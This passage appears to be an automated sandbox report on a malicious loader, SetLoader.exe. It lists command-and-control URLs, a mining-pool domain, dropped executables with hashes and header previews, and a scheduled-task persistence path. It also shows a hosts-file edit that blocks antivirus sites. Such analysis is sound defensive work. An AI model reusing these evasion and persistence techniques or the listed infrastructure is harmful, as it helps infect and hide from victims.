                https://support.mozilla.orgw1.exe, 00000004.00000002.2318909011.0000000009B6F000.00000004.00001000.00020000.00000000.sdmp, w1.exe, 00000004.00000002.2318909011.0000000009B68000.00000004.00001000.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://animoanimalestop.fun/w1.exe, 00000004.00000003.2276868902.0000000000F2A000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://animoanimalestop.fun:4438w1.exe, 00000004.00000003.2277021614.0000000000EEE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brw1.exe, 00000004.00000002.2318909011.0000000009B6F000.00000004.00001000.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://animoanimalestop.fun/Yw1.exe, 00000004.00000002.2317476232.0000000007F01000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://animoanimalestop.fun/yw1.exe, 00000004.00000003.2223062248.0000000000F29000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2214655196.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  172.67.195.146
                  		animoanimalestop.funUnited States
                  		13335CLOUDFLARENETUSfalse
                  146.59.154.106
                  		unknownNorway
                  		16276OVHFRfalse

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1498675
                  Start date and time:2024-08-25 15:42:09 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 11m 33s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:69
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:SetLoader.exe
                  Detection:MAL
                  Classification:mal100.adwa.spyw.evad.mine.winEXE@99/15@2/2
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target HealthTool.exe, PID 5628 because there are no executed function
                  • Execution Graph export aborted for target dwm.exe, PID 6072 because there are no executed function
                  • Execution Graph export aborted for target w1.exe, PID 5672 because there are no executed function
                  • Execution Graph export aborted for target w3.exe, PID 5328 because there are no executed function
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  09:43:52API Interceptor7x Sleep call for process: w1.exe modified
                  09:44:19API Interceptor42x Sleep call for process: powershell.exe modified
                  14:45:23Task SchedulerRun new task: WmiPrvSES path: C:\Users\user\AppData\Roaming\Microsoft\WmiPrvSE.exe

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  146.59.154.106SecuriteInfo.com.Win64.Evo-gen.9790.15318.exeGet hashmaliciousXmrigBrowse
                    RPHbzz3JqY.exeGet hashmaliciousScreenConnect Tool, PureLog Stealer, RedLine, Xmrig, zgRATBrowse
                      2mim34IfQZ.exeGet hashmaliciousAsyncRAT, PureLog Stealer, Xmrig, zgRATBrowse

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        xmr-eu1.nanopool.orgekBTbONX85.exeGet hashmaliciousXmrigBrowse
                        • 51.15.58.224
                        yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                        • 212.47.253.124
                        SecuriteInfo.com.Win64.Evo-gen.9790.15318.exeGet hashmaliciousXmrigBrowse
                        • 51.15.65.182
                        setup.exeGet hashmaliciousXmrigBrowse
                        • 51.15.58.224
                        Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                        • 162.19.224.121
                        25C1.exeGet hashmaliciousGlupteba, XmrigBrowse
                        • 51.15.193.130
                        file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                        • 54.37.137.114
                        Loader.exeGet hashmaliciousLummaC, XmrigBrowse
                        • 212.47.253.124
                        updater.exeGet hashmaliciousXmrigBrowse
                        • 141.94.23.83
                        SecuriteInfo.com.Win64.RATX-gen.29355.29242.exeGet hashmaliciousAsyncRAT, Nbminer, XmrigBrowse
                        • 54.37.232.103

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        CLOUDFLARENETUSHPSupportSolutionsFramework-13.0.1.131.exeGet hashmaliciousLummaCBrowse
                        • 172.67.215.62
                        0RmMail.exeGet hashmaliciousLummaCBrowse
                        • 104.21.16.180
                        0qbittorrent.exeGet hashmaliciousLummaCBrowse
                        • 104.21.28.66
                        continuesurf.b-cdn.net.ps1Get hashmaliciousLummaCBrowse
                        • 104.21.28.66
                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                        • 104.21.16.180
                        file.exeGet hashmaliciousLummaC, VidarBrowse
                        • 188.114.96.3
                        0RmMail.exeGet hashmaliciousLummaCBrowse
                        • 104.21.16.180
                        bot-test.b-cdn.net.ps1Get hashmaliciousLummaCBrowse
                        • 104.21.16.180
                        Setup.exeGet hashmaliciousLummaCBrowse
                        • 104.21.16.180
                        https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.cexz.top%2FTrade%2Ftradelist.html%3Ffbclid%3DIwZXh0bgNhZW0CMTAAAR3QXxe8AlutZYqRLhy6kfcRHX7ox79ANtoHkL5MFDvM9u_NxfXkkNAfcbE_aem_UDbPgNljQReqTdyzL1qAnA&h=AT0q7wmRkcJcM0QgxkcKmXpzdiZ2ZUH5T5Kvlz7u1IbzLVp1YAb0xfnp9rD61UTjjRPU9g0CsI9wwbfTxhZZHMiitY__RjpLcm73Ll-O6mHfrnKHdskDQLcrIZpxdHQfGWYjzAGet hashmaliciousUnknownBrowse
                        • 104.17.24.14
                        OVHFRhttp://designz23.liveGet hashmaliciousUnknownBrowse
                        • 51.89.247.112
                        http://yathuchandran.github.io/Metamask.cloneGet hashmaliciousUnknownBrowse
                        • 37.187.129.200
                        https://rogue-orange-foe.glitch.me/public/USANFCU.htmlGet hashmaliciousHTMLPhisherBrowse
                        • 164.132.25.184
                        https://jam-paq.com/api/aHR0cHM6Ly9nb29nbGUuY29t&sig=ZDUxNjU0ZTllNzZkYTAxNWE4OTNkZTAyM2ZkZDA1MGViMGIzY2UyOTU1MzY1NGMyNjFlOTExM2ZiMzA5MzdmMg&exp=MTcyNDIzOTUzMQGet hashmaliciousUnknownBrowse
                        • 149.56.200.84
                        RebelCracked.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                        • 51.38.43.18
                        https://app.degoo.com/share/9tVyiOLsGMdG31dc7RxXgwGet hashmaliciousUnknownBrowse
                        • 5.135.209.104
                        http://ikenn99.store/Get hashmaliciousUnknownBrowse
                        • 54.38.113.6
                        http://www.jetflightsimulatorperth.com.auGet hashmaliciousUnknownBrowse
                        • 37.187.129.45
                        Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
                        • 37.187.158.211
                        Review_Aonoro.pdfGet hashmaliciousUnknownBrowse
                        • 51.77.64.70

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        a0e9f5d64349fb13191bc781f81f42e1HPSupportSolutionsFramework-13.0.1.131.exeGet hashmaliciousLummaCBrowse
                        • 172.67.195.146
                        0RmMail.exeGet hashmaliciousLummaCBrowse
                        • 172.67.195.146
                        0qbittorrent.exeGet hashmaliciousLummaCBrowse
                        • 172.67.195.146
                        continuesurf.b-cdn.net.ps1Get hashmaliciousLummaCBrowse
                        • 172.67.195.146
                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                        • 172.67.195.146
                        file.exeGet hashmaliciousLummaC, VidarBrowse
                        • 172.67.195.146
                        0RmMail.exeGet hashmaliciousLummaCBrowse
                        • 172.67.195.146
                        bot-test.b-cdn.net.ps1Get hashmaliciousLummaCBrowse
                        • 172.67.195.146
                        Setup.exeGet hashmaliciousLummaCBrowse
                        • 172.67.195.146
                        3d3koK2Vun.exeGet hashmaliciousLummaCBrowse
                        • 172.67.195.146

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Windows\Temp\kzezoxxlsgop.sysfile.exeGet hashmaliciousXmrigBrowse
                          22.08.2024.exeGet hashmaliciousXmrigBrowse
                            3QKcKCEzYP.exeGet hashmaliciousLummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBCBrowse
                              ExeFile (375).exeGet hashmaliciousXmrigBrowse
                                file.exeGet hashmaliciousXmrigBrowse
                                  j0A1eprdwX.exeGet hashmaliciousUnknownBrowse
                                    Q5PewRuhqV.exeGet hashmaliciousUnknownBrowse
                                      fkABXcncEA.exeGet hashmaliciousRedLine, XmrigBrowse
                                        test2.exeGet hashmaliciousXmrigBrowse
                                          test.exeGet hashmaliciousXmrigBrowse

                                            Created / dropped Files

                                            C:\ProgramData\PcHealthTool\HealthTool.exe

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe
                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):831071200
                                            Entropy (8bit):6.635243298149964
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:FCE277E4928FDE19CD8BAD5CE1997792
                                            SHA1:DD439316C22AC10EE33E2E99D6988285113B35E3
                                            SHA-256:601FCAF45432343ACAD269A4F097502C13991BCD4CFE69ADD83F294EBF03A126
                                            SHA-512:B82DD922091882A2C1ACA4F5F997FEBC9866C164DE67DF7D8818B4D982EA5FEAD2509BA74621C3DD5AEE9626D940960114DCD14B264F24937A18ABAEE3714F2D
                                            Malicious:true
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....>.f..........#..........6l................@.......................................... .................................................8 ..P................*..........................................0...(...`...8............P...............................text...V........................... ..`.rdata..D+...0......................@..@.data.....l..`......................@....pdata........m.....................@..@.00cfg........m.....................@..@.tls..........m.....................@....2}k....k.....m..................... ..`.Zj[....H....P......................@....&T7......i..`....i.................`..h................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1940658735648508
                                            Encrypted:false
                                            SSDEEP:3:Nlllul3nqth:NllUa
                                            MD5:851531B4FD612B0BC7891B3F401A478F
                                            SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                            SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                            SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                            Malicious:false
                                            Preview:@...e.................................&..............@..........

                                            C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe

                                            Download File
                                            Process:C:\Users\user\Desktop\SetLoader.exe
                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):834649568
                                            Entropy (8bit):6.643347095555907
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:739213A2496D01E16DDC02B6898A81AD
                                            SHA1:D5DF030C567433CB17E00D24078665CE83BAF05D
                                            SHA-256:E3CC6A72B3259A15ABAB008AE056E8B91BEE5F02EAD801916EED2BDF47EEA2B9
                                            SHA-512:562D920796A4D358B7F2F9BA9DC404B457D94C1B352BC16A6795A7F6F77A95011F518771E266F745AAA69EDF9444F2D72C63C168881674E38C0EAA8D9A809740
                                            Malicious:true
                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d...O9.f..........".......]...B.....`.].......@......................................................@............... ...............`g......pf..P...0q..R0..@l.0.............g...............................g.(....................f.......f.F....................text.....].......]................. ..`.data.........].......].............@....bss....,.....e..........................idata...P...pf..R...ze.............@....didata.F.....f.......e.............@....edata.......`g......\f.............@..@.tls.........pg..........................rdata..m.....g......^f.............@..@.reloc........g......`f.............@..B.pdata..0....@l.......k.............@..@.rsrc....R0..0q..R0...o.............@..@.....................N..............@..@

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qv0cfeuv.iyy.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_searedck.grr.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sueelgo3.qto.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uvoiq0au.1it.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Roaming\Microsoft\WmiPrvSE.exe

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe
                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):827374560
                                            Entropy (8bit):6.610717486288164
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:286405D179DCBBC1ACB0B5957B45CDF7
                                            SHA1:2AC9DB419105F0FC8F3B2AFDA1EE58808BF1A8F7
                                            SHA-256:080A2EAC876384F97C5E49A6EB25E080126DF68B8514D5232E34D84122E232CE
                                            SHA-512:494DEBFAD957560496CEEF381254B5B100318C6856B3D93CDEE77FE3224D08A924C94FB0D0C47F5603676E0B4B2FA0DC54BB10601CDB1AE5BD5B634482F52661
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........#....(.....|......2.'........@.............................pP.......2... ..................................................u*.P....`P.......P..R..................................................@.P.@............................................text.............................. ..`.rdata..............................@..@.data....4..........................@....pdata..@)..........................@..@.oU[......... ...................... ..`.G&p.... ...........................@....>n>....$41.. ...61.................`..h.rsrc........`P......F1.............@..@................................................................................................................................................................................................................................................................................................

                                            C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1940658735648508
                                            Encrypted:false
                                            SSDEEP:3:NlllulhlL:NllUz
                                            MD5:04A4D910C1EE050C8E96A26F3F539E01
                                            SHA1:70DC4EC8282227775F2E7442755C38E996B628D1
                                            SHA-256:BA5BE56B35B0C07BA8908406F737B94A432D01C906F940DE8E8FF7E64AFF1A91
                                            SHA-512:9E6A907FFF726FDCF056BF2BD7476A68EF9B7ED90FA394A36AD41E37199F9CF3999F37C9C66515034277662DB27FCFD0C089BBACE1A5ACB066143CC4E311A8AC
                                            Malicious:false
                                            Preview:@...e................................................@..........

                                            C:\Windows\System32\drivers\etc\hosts

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):3046
                                            Entropy (8bit):4.232716031350585
                                            Encrypted:false
                                            SSDEEP:48:vDZhyoZWM9rU5fFcDL6iCW1RiJdASn7XP:vDZEurK9XiCW1RikSn7
                                            MD5:74BA6701F702FD970CB63E394CB42686
                                            SHA1:1793E243BE6364E6D5D7CDEB07CB95CB4A9E092F
                                            SHA-256:11B870F5110978A2E567702B65B4DBB66981D2DA43639F5F6F4FB93D19B52D59
                                            SHA-512:A2A75054B7E0137F4A72940EDB19ED5CB3BABE2EDADCBD0EC0EF8F11CEAAB225E54AA580D064C41B92011D73CEA7A8FA315E2442B0A8FE14F2D548B1B0B58FBA
                                            Malicious:true
                                            Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..

                                            C:\Windows\Temp\__PSScriptPolicyTest_jxjnuw3x.cmi.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Windows\Temp\__PSScriptPolicyTest_lcrqc52y.uwf.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Windows\Temp\__PSScriptPolicyTest_t3x2jpbl.hxo.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Windows\Temp\__PSScriptPolicyTest_um1zotvg.g0f.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Windows\Temp\kzezoxxlsgop.sys

                                            Download File
                                            Process:C:\ProgramData\PcHealthTool\HealthTool.exe
                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):14544
                                            Entropy (8bit):6.2660301556221185
                                            Encrypted:false
                                            SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                            MD5:0C0195C48B6B8582FA6F6373032118DA
                                            SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                            SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                            SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                            Malicious:true
                                            Joe Sandbox View:
                                            • Filename: file.exe, Detection: malicious, Browse
                                            • Filename: 22.08.2024.exe, Detection: malicious, Browse
                                            • Filename: 3QKcKCEzYP.exe, Detection: malicious, Browse
                                            • Filename: ExeFile (375).exe, Detection: malicious, Browse
                                            • Filename: file.exe, Detection: malicious, Browse
                                            • Filename: j0A1eprdwX.exe, Detection: malicious, Browse
                                            • Filename: Q5PewRuhqV.exe, Detection: malicious, Browse
                                            • Filename: fkABXcncEA.exe, Detection: malicious, Browse
                                            • Filename: test2.exe, Detection: malicious, Browse
                                            • Filename: test.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.686854374264549
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:SetLoader.exe
                                            File size:15'458'400 bytes
                                            MD5:68adcb0c0e4419351ae5371732ea78dd
                                            SHA1:66817456a9339399d01b37ebb59bca59cbc7ec7d
                                            SHA256:695cb5d1f8e58dc1c894791b70adc5bd1b0401e6e0fcf55a82637796ec236d84
                                            SHA512:3a21c097c783fec05fae9c0186751d968ee937b0b39c0c43113d9c881f53189b3d189c7652594c43ac2d1b1c4759798a4b7dd19b48c0ca9a4ebf7cc3515608fe
                                            SSDEEP:196608:zde8u5aBaVSXEJYAKFQWJHyHCMqariuk2k+i8rYnGx9cN/MfA122MLdrp5OH:zde8e8aVSUOAAXJcCQ42kZPnYcNKLRe
                                            TLSH:CAF6339DE716B0AFC953663309D789A32DF95C312D17DC8A075399A80BA63C0BC614FE
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W...6...6...6....V..6....T.'6....U..6..)MZ..6..)M...6..)M...6..)M...6...N$..6...N4..6...6...7..'M...6..'M...6..'MX..6..'M...6.

                                            File Icon

                                            Icon Hash:7039191309091c1a

                                            Static PE Info

                                            General

                                            Entrypoint:0x421d50
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x651BC7F7 [Tue Oct 3 07:51:19 2023 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:75e9596d74d063246ba6f3ac7c5369a0

                                            Entrypoint Preview

                                            Instruction
                                            call 00007F31886027FBh
                                            jmp 00007F31886021ADh
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            push 00424F20h
                                            push dword ptr fs:[00000000h]
                                            mov eax, dword ptr [esp+10h]
                                            mov dword ptr [esp+10h], ebp
                                            lea ebp, dword ptr [esp+10h]
                                            sub esp, eax
                                            push ebx
                                            push esi
                                            push edi
                                            mov eax, dword ptr [0044277Ch]
                                            xor dword ptr [ebp-04h], eax
                                            xor eax, ebp
                                            push eax
                                            mov dword ptr [ebp-18h], esp
                                            push dword ptr [ebp-08h]
